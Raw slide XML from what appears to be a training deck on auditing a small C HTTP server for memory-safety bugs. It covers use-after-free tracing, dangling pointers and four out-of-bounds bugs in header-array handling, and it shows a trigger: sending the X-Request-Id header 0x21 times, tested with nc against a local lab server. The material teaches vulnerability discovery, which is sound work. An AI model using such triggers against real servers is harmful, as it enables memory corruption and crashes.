              <a:rPr lang="en-US" sz="2000" b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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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127.0.0.1 8081</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p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1"/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Python code for HTTP request - raw">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F11838-1690-8C49-AD3A-D7FC4361F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521" y="939998"/>
            <a:ext cx="598462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9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5626-9164-5D40-BAA6-C47DA800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HTTP Request  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="HTTP Request - via Python">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D00509-F716-704D-924A-2E54A0A2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54" y="1031706"/>
            <a:ext cx="7099300" cy="1968500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="https://developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0AB0B26-49DB-9B48-937F-61ECD159F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2" t="38580" r="16048" b="32677"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835617" y="3050448"/>
            <a:ext cx="4520795" cy="11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CC18A9-B5DC-1E49-AB81-4D5F2D23FAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835617" y="4385657"/>
            <a:ext cx="4698347" cy="757843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E1DDDD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BODY Line 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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BODY Line 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64348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5626-9164-5D40-BAA6-C47DA800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HTTP Response – HTML </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="HTTP response - html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7DD30D0-91FF-DC4D-9252-96876447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2" y="899896"/>
            <a:ext cx="6985308" cy="41736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10CE15-81A0-F14A-B27C-A5C4308544B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870012" y="1191086"/>
            <a:ext cx="634457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9DA2F-006A-CB43-9508-EB32B8CFD313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870012" y="2257885"/>
            <a:ext cx="698530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FE0DB6-9B3C-C345-8030-5E6430CF7409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870012" y="5073586"/>
            <a:ext cx="698530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D7D13D-622B-304C-BA77-AA8D3A96D23A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7855320" y="2257885"/>
            <a:ext cx="0" cy="281570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B9CD45-72C6-C341-BB30-C0D13BB88371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="870012" y="2257884"/>
            <a:ext cx="0" cy="281570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75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4323-EEBC-D54E-B5EB-8EE80C28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Class So Far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39ECC3-102D-89F3-7119-47FCF83E85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600265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066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9B1A-52FF-4646-B6B7-B1ACED8A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Review of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B54A-6439-994C-97FC-5DBC6E217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7886700" cy="3761587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hierarchy of ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src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server.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utils.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utils.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for creating HTTP routes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defined routes with callback handlers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom headers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27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66C8-A996-B84E-8812-4F98BF4D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Pattern Matching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6B477655-B09C-1845-1A95-6C78A662A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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pick a vulnerability class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> way to detect the problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stare at this until your eyes bleed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Staring - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B56E86A7-5C98-9D40-BCE2-68B402D8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1767585"/>
            <a:ext cx="3886200" cy="24667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0591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D67E-F2E9-A84E-AB39-F9C36A23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Source Code Review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C1B90B-4076-C20E-D589-C4F817EEE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28673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8650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7AC5-8486-D243-9959-6788352A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After Free Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Use after free diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F928AE-AE85-CB48-AABF-329E098F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29" y="1268019"/>
            <a:ext cx="5220677" cy="26103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6A450-4C7A-4F49-A7FF-D29C8F0F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320" y="1272984"/>
            <a:ext cx="3152171" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate to Pointer 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free Pointer 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate to Pointer 2 (recycles the memory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both pointers can edit/view the same memory!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1975236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2AA4-E092-7146-BE5D-7A23E961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Tracing a Use After Free – 1 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3A3923F-BA97-1FE9-061D-51B0BC66B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Free Then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0646-0A80-5348-A937-C3B987AFE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Identify calls to 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free() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on the variable.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Trace code base for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of this variable.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there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, then we have found a vulnerability.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050" name="Picture 2" descr="New digital tools could speed up Covid-19 contact tracing - STAT">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2CA09D9-FC0C-2A48-B0C5-E520D3F8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0486" y="1016053"/>
            <a:ext cx="3558055" cy="199251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Free then Use vuln">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB23D6A-C01C-EF42-BA52-23402D7B9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486" y="3085268"/>
            <a:ext cx="3768250" cy="198039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C272-142B-4349-8151-5DEBE92254C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810486" y="4995920"/>
            <a:ext cx="228389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43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2AA4-E092-7146-BE5D-7A23E961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Tracing a Use After Free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0646-0A80-5348-A937-C3B987AFE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31968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all occurrences of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> being 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Identify calls to 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free() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on the memory.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Trace code base for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of these variables.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there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, then we have found a vulnerability.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37" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B34DFB88-4D72-B4CD-1A94-B93EC70B1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4609" y="1181502"/>
            <a:ext cx="3887391" cy="617934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Dangling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Hanging on cliff Images, Stock Photos &amp; Vectors | Shutterstock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE762B8B-9FD8-234C-9E11-B32B9CBA9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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4498182" y="1144380"/>
            <a:ext cx="3056380" cy="201890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Dangling pointer UAF">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A51E2855-BAAE-994A-9251-5C201EE8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182" y="3205017"/>
            <a:ext cx="3056380" cy="18516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6FF4EC-DC30-0A40-9D47-00459FA3DD60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498182" y="5056693"/>
            <a:ext cx="228389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E7849B-4B5C-5042-8D65-4E7CEBBFB19E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498182" y="3907235"/>
            <a:ext cx="291000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34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ABAE-60F8-7146-A683-D378AD9D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UAF in Code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CA0F3-D8AF-D04D-8AFF-914A5B9AD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struct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line_one_req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begin_request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First line struct">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31707204-E37D-FB44-A35B-203729B5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50" y="1631153"/>
            <a:ext cx="6248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7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2C9D-FA9A-E747-A156-A840A8E4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Your Turn to Trace Bugs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Iterating over an array in C">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87CFC08A-B7D5-154B-9942-B37443EA5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2" y="1369219"/>
            <a:ext cx="3886200" cy="188216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A2A2-A54B-B949-9F70-BAE60DCF7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Array iterations</a:t>
            </a:r>
          </a:p>
          <a:p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res_header_lst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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of pointers to response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maximum size: 0x20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3122139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res_header_lst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 != NULL: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> have an assigned header yet?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Index &lt; 0x20: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are we passed the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>maximum size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the array? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Iterating on the 'res_header_lst' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967AC837-F8F6-0D44-B1D1-36655BCA4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232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191539" y="2868293"/>
            <a:ext cx="6914073" cy="1192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1305531" y="3752252"/>
            <a:ext cx="654436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41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90" y="242369"/>
            <a:ext cx="9159499" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Array Iteration – Bug 1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>serve_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) 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over iteration: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will STOP at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Check to STOP usage with 0x20 as index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More than 0x20 responses header – off by 1 pointer write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Iterating on the 'res_header_lst' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967AC837-F8F6-0D44-B1D1-36655BCA4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56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191539" y="2868293"/>
            <a:ext cx="6914073" cy="173470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1299819" y="4612408"/>
            <a:ext cx="654436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67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1DE3-26EC-FB48-9A06-4AECB9BE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HTTP Server – From Scratch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7ACAC9-F3F7-42C6-6672-3F5E60027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12459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103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" y="43417"/>
            <a:ext cx="9926665" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Array Iteration – Bug 2 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>interpret_single_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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over iteration: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will STOP at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Check to STOP usage with 0x20 as index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More than 0x20 responses header – off by 1 pointer write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Iterating on the 'res_header_lst' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967AC837-F8F6-0D44-B1D1-36655BCA4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56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191539" y="2868293"/>
            <a:ext cx="6914073" cy="173470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1299819" y="4612408"/>
            <a:ext cx="654436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09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492" y="2737"/>
            <a:ext cx="9926665" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Array Iteration – Bug 3 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send_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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  <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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bounds check – only a pointer check </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Reads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OOB of array into the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response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Out of bounds pointer usage (read) ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59980646-496D-334B-ABE8-C68AE4A6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" y="2852859"/>
            <a:ext cx="9096939" cy="154091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69741" y="3657050"/>
            <a:ext cx="654436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097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0"/>
            <a:ext cx="9926665" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Array Iteration – Bug 4 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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cleanup_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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  <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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bounds check – only a pointer check </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Freeing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OOB of array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5" name="Picture 4" descr="Out of bounds free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28637AB3-E627-8A44-B00D-2710B4D7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3" y="2385031"/>
            <a:ext cx="5922406" cy="275573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807732" y="3393579"/>
            <a:ext cx="555819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05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F688-F5E3-7348-BBCC-E6C2855B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Bug Recap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="The Mushroom Cloud">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5901708-7E25-8043-967D-165777550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r="-2" b="-2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02E6-E32F-754A-BE1F-CAC268AA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Two out of bounds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>writes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One out of bounds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One out of bounds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng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189946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53A1-D575-4B40-AC3C-FB8CB00D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Trigger? Bugs 1 &amp;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2569-32CC-224C-BD2A-472FFB6AC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Force 0x21 headers to be used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X-Request-Id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is ALWAYS reflected in the response: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use this header 0x21 times to trigger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Iterating on the 'res_header_lst' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA4A8C8-D264-B946-A8CA-A59FFC865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56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="371959" y="2868293"/>
            <a:ext cx="6914073" cy="17347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38E20C-4AC5-4841-A14E-ABB18CB80DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
